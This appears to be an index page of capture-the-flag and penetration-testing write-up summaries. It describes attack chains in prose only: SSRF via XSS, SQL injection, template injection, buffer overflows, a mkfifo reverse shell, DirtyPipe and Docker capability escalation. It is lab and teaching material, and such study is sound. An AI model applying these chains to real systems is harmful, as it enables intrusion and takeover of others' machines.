In this article, we explore an exploit that follows a specific flow to obtain a remote shell. The process includes byte generation, a jump to the ESP memory address, and shellcode execution. Through detailed steps and the use of tools such as mona.py and msfvenom, we demonstrate how to exploit a vulnerability and achieve the desired goal.
)
This is an easy machine, the intrusion started by taking advantage of an outdated version of OpenNetAdmin, sending a crafted request to the server and gaining remote command execution as the user www-data, then I had to do a user pivotting to become the user douglas by cracking a hash using a 10-character password pattern.
This is a crazy difficult machine, for the intrusion I leveraged XSS to derive to SSRF and thus gain access by abusing the creation of AWS lambda functions. For the privilege escalation I found a task that was executed at regular time intervals, this concatenated the –handler parameter when creating the lambda function so I managed to inject commands and become root in the container.
This is a hard difficulty machine, I concatenated Type Juggling with a SQL injection to upload files using into outfile and gain access as ‘www-data’, for escalation I took advantage of the outdated version of the Kernel to exploit *DirtyPipe.
This is a difficult machine, for the intrusion I take advantage of a ‘Server Side Template Injection’ to gain RCE, the privilege escalation consists of a Binary vulnerable to ‘Buffer Overflow’ but with a peculiarity, little space in the stack memory, so it is necessary to derive to a ‘Socket Reuse’.
In this article I teach how to create and use a buffer overflow exploit to gain access to a shell by abusing unsafe functions like strcpy, getenv etc. I also show how the binary works at a low level, the ESP and EIP registers and how to use tools like gdb or hexedit to edit hexadecimal binaries.
Strapi CMS version 3.0.0-beta.17.4 mishandles password resets, allowing an attacker to take control of a privileged account, so I have developed an exploit module in Metasploit and teach you how to exploit this vulnerability in a practical way.
This article is merely informative to understand how the base64 encoding algorithm works. I begin with a brief Introduction on what Cryptography is to situate the subject a little. I also give examples of its use in the field of cybersecurity.
This is an easy difficulty machine, the first Android machine, for its intrusion I found with Nmap that ES File Explorer was running, looking at this I looked for exploits and found that it was vulnerable to reading arbitrary files on the device, enumerating it a bit I found an image with a credential that served me to access via SSH, for the escalation the machine had the adb port open, I simply connected to it.
This is a hard difficulty machine, for the intrusion I took advantage of a vulnerable version of ‘cacti’ and gained access to the machine by exploiting ‘SQLi’ in an automated manner and gaining access from a ‘mkfifo’ reverse shell, for the escalation I found a Docker ‘capability’ called ‘SYS_MODULE’ vulnerable to privilege escalation.